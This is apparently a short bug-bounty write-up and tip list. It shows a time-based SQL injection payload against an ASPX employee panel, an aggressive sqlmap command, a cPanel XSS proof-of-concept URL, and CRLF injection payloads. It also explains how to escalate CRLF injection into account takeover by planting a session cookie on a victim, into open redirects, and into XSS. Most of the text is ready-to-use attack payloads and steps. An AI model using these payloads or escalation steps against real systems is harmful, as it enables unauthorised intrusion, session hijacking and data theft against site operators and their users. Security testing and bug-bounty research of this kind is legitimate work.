For those asking about the write-up:
Found an employee panel running on ASPX.
I kept trying SQL in the user parameter:
1)
I used a sleep payload
';WAITFOR DELAY '0:0:5'--
and the server got delayed for 5 s.
2)
Saved the POST request to a txt file
sqlmap -r txt -p user --force-ssl --level 5 --risk 3
Top P1s to find:
1) SQL Injection
2) IDOR
3) XSS
4) CSRF
5) Session Fixation
6) OAuth Misconfiguration
7) Missing Authentication
8) Session Hijacking
9) Secret Tokens / Secret Credentials leakage
10) Use of Default Credentials
cPanel XSS
PoC: /login?user=sth%22+onfocus=%22alert()%22+id=%22xss%22+%22%ff#xss
CRLF Tip:
Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.
Now escalate the impact:
1- ATO
If the web app is vulnerable to Session Fixation, simply set a new cookie using the CRLF and send it to the victim, then try to log in with the injected cookies.
2- Open redirect
Just add a "Location:" header.
3- XSS
- Add the "Location:" header with the value "javascript: confirm(1)"
- Add the "Content-Length:" header; this makes the response body be read right after the response headers, then add your XSS payload.